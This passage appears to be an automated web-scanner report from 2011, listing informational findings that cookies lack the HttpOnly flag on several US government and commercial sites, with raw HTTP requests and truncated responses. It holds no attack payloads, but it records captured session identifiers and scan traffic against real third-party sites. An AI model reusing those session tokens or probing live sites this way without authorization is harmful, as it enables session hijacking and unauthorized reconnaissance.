14.633. https://www.scsignon.sc.gov/eng/Secured/Security/CreateUserName.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /eng/Secured/Security/CreateUserName.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /eng/Secured/Security/CreateUserName.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:08 GMT
Connection: close
Content-Length: 35575
Set-Cookie: TS958e6e=226dae4efe979dc85adeff56f4125f3a8f3c5cdacd73a69a4dbc0329; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS Register User - Create User Name
       </title>
       <meta http-equiv="Content-Type" conten
...[SNIP]...

14.634. http://www.state.co.us/gov_dir/leg_dir/gaweb/scroom353.asx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.co.us
Path:   /gov_dir/leg_dir/gaweb/scroom353.asx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gov_dir/leg_dir/gaweb/scroom353.asx HTTP/1.1
Host: www.state.co.us
Proxy-Connection: keep-alive
Referer: http://www.leg.state.co.us/clics/clics2011a/cslFrontPages.nsf/Audio?OpenForm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:23:47 GMT
Server: Microsoft-IIS/4.0
Cache-Control: max-age=300
Expires: Sat, 30 Apr 2011 11:28:47 GMT
Content-Type: video/x-ms-asf
Accept-Ranges: bytes
Last-Modified: Fri, 17 Nov 2006 18:57:14 GMT
ETag: "1ee621327aac71:34a32"
Content-Length: 403
Set-Cookie: BIGipServer=515899402.20480.0000; path=/

<asx version = "3.0">
<entry>
<ref href = "mms://192.70.175.128/SCR 353"/>
<Title>Senate Committee Room 353</Title>
<Author>Colorado General Assembly</Author>
<Copyright></Copyright>
...[SNIP]...

14.635. http://www.state.mn.us/portal/mn/jsp/content.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/content.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/mn/jsp/content.do HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:27 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0987379643.1304167227@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 110
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='content.do?'",100);
</SCRIPT>



14.636. http://www.state.mn.us/portal/mn/jsp/contentprocess.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/contentprocess.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/mn/jsp/contentprocess.do HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:28 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0381833057.1304167228@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 105
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='false?'",100);
</SCRIPT>



14.637. http://www.state.mn.us/portal/mn/jsp/home.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/home.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/mn/jsp/home.do?agency=NorthStar HTTP/1.1
Host: www.state.mn.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:21 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadeldidhfggcfjkcenndfjgdgom.0:@@@@1803480290.1304161941@@@@; path=/portal
Content-Type: text/html;charset=utf-8
Content-Length: 35112


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
   
   
<title>Minnesota North Star
...[SNIP]...

14.638. http://www.state.mn.us/portal/mn/jsp/hybrid.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/hybrid.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/mn/jsp/hybrid.do HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:29 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0916319777.1304167229@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 109
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='hybrid.do?'",100);
</SCRIPT>



14.639. http://www.state.mn.us/portal/mn/jsp/logon.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/logon.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/mn/jsp/logon.do HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:29 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0942585687.1304167229@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 105
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='false?'",100);
</SCRIPT>



14.640. http://www.state.mn.us/portal/mn/jsp/redirectLink.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/redirectLink.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/mn/jsp/redirectLink.do HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:30 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1989322047.1304167230@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 105
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='false?'",100);
</SCRIPT>



14.641. http://www.state.mn.us/portal/mn/jsp/search.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/search.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/mn/jsp/search.do HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:30 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1693126631.1304167230@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 105
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='false?'",100);
</SCRIPT>



14.642. http://www.state.sd.us/calendar/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.sd.us
Path:   /calendar/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /calendar/index.cfm HTTP/1.1
Host: www.state.sd.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Redirect
Set-Cookie: ARPT=QKQJZWS164.154.226.254T0x0000000e_0xc7307f41CMYJW; expires=Mon, 30-Apr-2012 12:40:33 GMT; path=/
Content-Length: 158
Content-Type: text/html
Location: http://www.sd.gov/feedback/404.aspx
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "webmaster@state.sd.us" on "2001.06.14T11:21-0500" exp "2004.06.14T12:00-0500" r (v 0 s 0 n 0 l 0))
Date: Sat, 30 Apr 2011 12:40:33 GMT
Connection: close

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.sd.gov/feedback/404.aspx">here</a></body>

14.643. http://www.surveymonkey.com/jsPop.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surveymonkey.com
Path:   /jsPop.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsPop.aspx?sm=S76tDGCVR8qVtlppre7tsA_3d_3d HTTP/1.1
Host: www.surveymonkey.com
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/home/0,2061,4802,00.html;jsessionid=E163D8F13AEF17647444D0A429B79A87
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 188
Content-Type: text/html; charset=utf-8
Location: /pop.aspx?sm=gGei6GS82w2TU%2f1TP8s8gsW339nHerF1EzoXumpG4Go%3d
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: P_18884248=1; path=/
X-ServerID: 61
Date: Sat, 30 Apr 2011 00:35:47 GMT
Set-Cookie: CookieMonkey=1074004234.20480.0000; path=/
X-Powered-By: Bananas and Rum
X-Monkey-Sign: Barrel of Monkeys

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fpop.aspx%3fsm%3dgGei6GS82w2TU%252f1TP8s8gsW339nHerF1EzoXumpG4Go%253d">here</a>.</h2>
</body></html>

14.644. http://www.va.gov/directory/guide/division_flsh.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.va.gov
Path:   /directory/guide/division_flsh.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directory/guide/division_flsh.asp HTTP/1.1
Host: www.va.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s={"v":1,"rid":"1304117532703_517290","pv":2,"to":5,"c":"http://www.va.gov/landing2_contact.htm","lc":{"d2":{"v":2,"s":false}},"cd":2,"sd":2,"f":1304123963094}; TSb10539=80cacfc42d1d4f40ba214cdbf5db1539665370359c60aa8d4dbb5a23c2db820ec935e97e6ded1920fabfe7d6; fsr.a=1304123974811; BIGipServerwww.va.gov_pool=1694607552.20480.0000; BIGipServerwww.va.gov.subpages_pool=1761716416.20480.0000;

Response

HTTP/1.0 302 Found
Location: http://www2.va.gov/directory/guide/division_flsh.asp
Connection: close
Content-Length: 0
Set-Cookie: TSb10539=c3ba65b4faf859b134b6fb9024804918892768e0cec7cdb14dbc0359; Max-Age=900; Path=/


14.645. http://www.va.gov/iris/home.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.va.gov
Path:   /iris/home.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iris/home.html HTTP/1.1
Host: www.va.gov
Proxy-Connection: keep-alive
Referer: http://www.va.gov/landing2_contact.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.va.gov_pool=1694607552.20480.0000; TSb10539=d1659b3dbd3bd12ebed70be270b14ecd665370359c60aa8d4dbb5a23c2db820ec935e97e; fsr.s={"v":1,"rid":"1304117532703_517290","pv":2,"to":5,"c":"http://www.va.gov/landing2_contact.htm","lc":{"d2":{"v":2,"s":false}},"cd":2,"sd":2,"f":1304123963094}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 12 Jan 2011 20:43:36 GMT
Accept-Ranges: bytes
ETag: "0c5a6299b2cb1:0"
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:43:25 GMT
Set-Cookie: BIGipServerwww.va.gov.subpages_pool=1761716416.20480.0000; path=/
Set-Cookie: TSb10539=80cacfc42d1d4f40ba214cdbf5db1539665370359c60aa8d4dbb5a23c2db820ec935e97e6ded1920fabfe7d6; Max-Age=900; Path=/
Content-Length: 4149


<!--#include file="ext_appr_site.inc" -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!-- START: META DATA -->
...[SNIP]...

14.646. http://www.va.gov/landing2_contact.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.va.gov
Path:   /landing2_contact.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /landing2_contact.htm HTTP/1.1
Host: www.va.gov
Proxy-Connection: keep-alive
Referer: http://va.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.s={"v":1,"rid":"1304117532703_517290","pv":1,"to":3,"c":"http://va.gov/","lc":{"d2":{"v":1,"s":false}},"cd":2,"sd":2}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 06 Apr 2011 16:28:08 GMT
Accept-Ranges: bytes
ETag: "0dcd99c77f4cb1:0"
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:39:00 GMT
Set-Cookie: BIGipServerwww.va.gov_pool=1694607552.20480.0000; path=/
Set-Cookie: TSb10539=78d469c0c0998f6c0f60cd53273f44e5a9d39cec214f31cf4dbb5a23c2db820ec935e97e; Max-Age=900; Path=/
Content-Length: 7282

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>

<!-- START: META DATA -->
<meta http-equiv="Content-Type" content="
...[SNIP]...

14.647. http://www.va.gov/opa/pressrel/pressrelease.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.va.gov
Path:   /opa/pressrel/pressrelease.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /opa/pressrel/pressrelease.cfm HTTP/1.1
Host: www.va.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s={"v":1,"rid":"1304117532703_517290","pv":2,"to":5,"c":"http://www.va.gov/landing2_contact.htm","lc":{"d2":{"v":2,"s":false}},"cd":2,"sd":2,"f":1304123963094}; TSb10539=80cacfc42d1d4f40ba214cdbf5db1539665370359c60aa8d4dbb5a23c2db820ec935e97e6ded1920fabfe7d6; fsr.a=1304123974811; BIGipServerwww.va.gov_pool=1694607552.20480.0000; BIGipServerwww.va.gov.subpages_pool=1761716416.20480.0000;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: index.cfm
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:40:59 GMT
Connection: close
Set-Cookie: BIGipServercold_fusion_2_pool=218212544.20480.0000; path=/
Set-Cookie: TSb10539=11a766776ce5d62f2004949d0886f31fdaa3fb8c162f6be44dbc035a16374947a53410b3; Max-Age=900; Path=/
Content-Length: 0


14.648. http://www.visitflorida.com/includes/js/footerSurvey.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /includes/js/footerSurvey.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/js/footerSurvey.php HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vf_survey_id=ucr8rgmvej8vuckb1d2o3lktc1; expires=Sun, 29-Apr-2012 12:41:04 GMT; path=/
Set-Cookie: vf_survey_pages=1; expires=Sun, 29-Apr-2012 12:41:04 GMT; path=/
Content-Length: 2147
Connection: close
Content-Type: text/html; charset=UTF-8

if (typeof(console)=="object") console.log("cid=ucr8rgmvej8vuckb1d2o3lktc1");if (typeof(console)=="object") console.log("newcount=528376");


var s_show = false;

if (typeof(console)=='ob
...[SNIP]...

14.649. http://www.vitalchek.com/Campaign  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitalchek.com
Path:   /Campaign

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Campaign?site=2&clickid=646829930273374210 HTTP/1.1
Host: www.vitalchek.com
Proxy-Connection: keep-alive
Referer: http://www.dhh.louisiana.gov/offices/page.asp?id=252&detail=7752
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Set-Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; path=/
Content-Length: 195
Content-Type: text/html
Location: http://www.vitalchek.com/Campaign/?site=2&clickid=646829930273374210
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:08:21 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.vitalchek.com/Campaign/?site=2&amp;clickid=646829930273374210">here</a></body>

14.650. http://www.vitalchek.com/Campaign/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitalchek.com
Path:   /Campaign/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Campaign/?site=2&clickid=646829930273374210 HTTP/1.1
Host: www.vitalchek.com
Proxy-Connection: keep-alive
Referer: http://www.dhh.louisiana.gov/offices/page.asp?id=252&detail=7752
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=QUIPIMSvcnwpis06CKQLL

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 01:08:22 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Location: http://www.vitalchek.com/agency_locator.aspx?providerID=90218&click_id=646829930273374210
Set-Cookie: ASP.NET_SessionId=hbnu4jzumfo3kquopgrwm455; path=/; HttpOnly
Set-Cookie: site_5_clickid=646829930273374210%2c44155373%2c44155373; expires=Wed, 15-Apr-2071 01:08:22 GMT; path=/
Set-Cookie: CampaignStamp=4/29/2011 8:08:22 PM; expires=Wed, 15-Apr-2071 01:08:22 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 210

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.vitalchek.com/agency_locator.aspx?providerID=90218&amp;click_id=646829930273374210">here</a>.</h2>
</body
...[SNIP]...

14.651. http://www.vitalchek.com/Telerik.Web.UI.WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitalchek.com
Path:   /Telerik.Web.UI.WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Telerik.Web.UI.WebResource.axd?_TSM_HiddenField_=ctl00_RadScriptManager1_TSM&compress=1&_TSM_CombinedScripts_=%3b%3bSystem.Web.Extensions%2c+Version%3d3.5.0.0%2c+Culture%3dneutral%2c+PublicKeyToken%3d31bf3856ad364e35%3aen-US%3a3de828f0-5e0d-4c7d-a36b-56a9773c0def%3aea597d4b%3ab25378d2%3bTelerik.Web.UI%3aen-US%3ae4ca4719-c559-4761-8501-9be20bbda1fe%3a16e4e7cd%3af7645509%3a22a6274a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vitalchek.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=QUIPIMSvcnwpis05CKQLY; path=/
Date: Sat, 30 Apr 2011 01:11:44 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Cache-Control: public, max-age=31535997
Expires: Sun, 29 Apr 2012 01:11:42 GMT
Last-Modified: Tue, 15 Mar 2011 00:00:00 GMT
Vary: User-Agent
Content-Type: application/x-javascript
Content-Length: 262892

/* START MicrosoftAjax.js */
//----------------------------------------------------------
// Copyright (C) Microsoft Corporation. All rights reserved.
//--------------------------------------------
...[SNIP]...

14.652. http://www.vitalchek.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitalchek.com
Path:   /WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=NWSGWhAlx4kb4KiCl4231HRYLGve9M6N1WZF0sSKBXOyyukDmZ9nSMPKidLLiF3nlF6ZVktOfVF8txlmHJ7TOmS6wSQ1&t=634232976375312500 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
